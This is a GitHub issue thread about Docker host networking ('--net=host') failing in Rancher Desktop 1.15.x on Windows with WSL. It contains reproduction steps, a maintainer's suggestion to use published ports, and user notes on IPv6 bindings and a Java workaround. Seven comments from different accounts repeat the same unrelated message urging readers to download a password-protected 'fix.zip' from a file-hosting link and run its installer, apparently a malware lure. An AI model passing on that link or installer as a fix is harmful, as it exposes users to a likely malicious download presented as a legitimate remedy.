### ISSUE TITLE
Docker network setting "--net=host" does not work with 1.15.x using windows and wsl

### ISSUE THREAD

**Issue by benzman81** [rancher-sandbox/rancher-desktop#7378]
### Actual Behavior

Starting a docker container in wsl with network setting "--net=host" does not work anymore as host servers are not available in container and container services not in wsl.

### Steps to Reproduce

1. start some server in wsl (i used npm install -g http-server and started it with http-server -p 8686)
2. Start a docker container with network setting "--net=host"
3. Try "wget http://localhost:8686" in container.
4. Result ist Connection refused

The other way around:
1. Start a docker container with network setting "--net=host"
2. start some server in container (i used npm install -g http-server and started it with http-server -p 8787)
3. Try "wget http://localhost:8787" in wsl.
4. Result ist Connection refused

### Result

Result ist Connection refused wheren accessing both servers.

### Expected Behavior

Both services are reachable.

### Additional Information

Downgrading back to 1.14.2 also did not work until I disabled "Networking Tunnel". Then it starts working again.

Maybe its related to https://github.com/rancher-sandbox/rancher-desktop/issues/7294 as the address 192.168.1.1 is already pingable within my company network even without starting rancher.

For now we seem to be stuck on 1.14.2 with disabled network tunnel.

### Rancher Desktop Version

1.15.x

### Rancher Desktop K8s Version

1.30.4

### Which container engine are you using?

moby (docker cli)

### What operating system are you using?

Windows

### Operating System / Build Version

Microsoft Windows 10 Enterprise 10.0.19045 Build 19045

### What CPU architecture are you using?

x64

### Linux only: what package format did you use to install Rancher Desktop?

None

### Windows User Only

Yes, we use Pulse Secure VPN.

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Nino-K** [comment]
@benzman81 I managed to reproduce this in the version you mentioned, however, I also tested this in our previous versions 1.11.1 (of course not using Network Tunnel), and it still did not work. It looks as though we have never supported the host network driver mode. However, after reading the [documents](https://docs.docker.com/engine/network/drivers/host/) closely, if you use `-p` to publish your ports, you will probably achieve what you are trying to do. Once you use the published port flag, you can use one of the following domains to access your port within the container. 

```
host.docker.internal
```
or 
```
host.rancher-desktop.internal
```

 Can I ask you what is your use case? so, I can help you better.

**Comment by benzman81** [comment]
@Nino-K hi, we use vscode with RancherDesktop, WSL and Devcontainer. Until 1.15.x all ports from WSL have been available in the devcontainer and all servers started in devcontainer were available outside the devcontainer in WSL( my collegues are using 1.13.x to 1.14.x I think, some may use older versions but without devcontainer). Since ports on both side are not fixed as it differs per developer and use case, we used host network for starting the devcontainer. Now v1.15. stops us from upgrading. Hope that helps.

**Comment by Nino-K** [comment]
I think I understand a bit better, can you guys avoid using `--net=host` argument and instead use `-p` (published ports) instead?

**Comment by benzman81** [comment]
As I stated, since ports are not fixed I do not know how to solve this. It is not defined which server and how many a developer starts in wsl oder in the devcontainer.

**Comment by gi-dorio** [comment]
We are experiencing the same issue. I am working with an older Rancher Desktop version (1.10.0) and the network mode "host" seems to work fine. A colleague, who's working with Rancher Desktop 1.15.1, is not able to see anything published with network mode "host". While port mapping is still an option, the network mode "host" helps with reducing clutter in our docker-compose file, so it would be nice to be able to use it

**Comment by Facecube** [comment]
For people still experiencing the problem that they cannot connect to a service in a container with --net=host on windows, the following might be interesting:
* The fix by @Nino-K only forwards IPv4 bindings to the host
* IPv6 bindings are available inside the rancher-desktop WSL distribution, however ignored by the procnet scanner
* This can be a pitfall when running JVM webserver containers, because by default Java prefers to bind to IPv6 sockets, if IPv6 is enabled. A workaround is setting `-Djava.net.preferIPv4Stack=true` in the `JAVA_TOOL_OPTIONS` (https://docs.oracle.com/javase/8/docs/api/java/net/doc-files/net-properties.html). Alternatively one can also disable IPv6 in the rancher-desktop WSL distribution.
* Reading through the related code one finds that this behaviour is "expected". Linking the following issue for visibility: #2062.

**Comment by ryanmda** [comment]
Also an issue when attempting to communicate from the docker container's application back to a listening port in WSL, which host networking normally allows. Unless someone has raise a new defect for this that I couldn't find.

**EDIT:** Note that we are intentionally staying on 1.12.x versions because we need this workflow. Another team member on 1.22.0 still ran into this. The above response does not address this scenario and my understanding of the linked PRs is they would only resolve issues reaching listening ports inside the container.
